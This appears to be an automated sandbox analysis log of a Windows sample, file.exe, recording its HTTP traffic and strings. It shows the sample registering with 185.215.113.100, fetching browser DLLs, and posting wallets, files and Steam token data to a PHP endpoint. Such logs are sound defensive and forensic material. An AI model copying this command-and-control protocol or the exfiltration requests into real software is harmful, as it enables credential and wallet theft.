              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file"------BFHJECAAAFHIJKFIJEGC--
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 185.215.113.100Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="message"wallets------AEBKKECBGIIJJKECGIJE--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 185.215.113.100Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="message"files------JJEGIJEGDBFHDGCAFCAE--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file"------AKFIDHDGIEGCAKFIIJKF--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 185.215.113.100Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="message"ybncbhylepme------GHJKJDAKEHJDGDGDGHID--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.100Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJJKFBAAAFHJEBFIEGID--
              Source: Joe Sandbox ViewIP Address: 185.215.113.100 185.215.113.100
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00185000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00185000
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/freebl3.dll
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/mozglue.dll
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dll)
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dllK
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dll
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllc
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/softokn3.dll
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2284021788.0000000029A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll
              Source: file.exe, 00000000.00000002.2284021788.0000000029A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php$
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php(
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php0
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php3
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php:
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php=Iq
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpBrowser
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpH;
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpLo
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpf
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phph
              Source: file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
              Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpm
              Source: file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpndI
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpp
              Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100Z
              Source: file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100e2b1563c6670f193.phpion:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
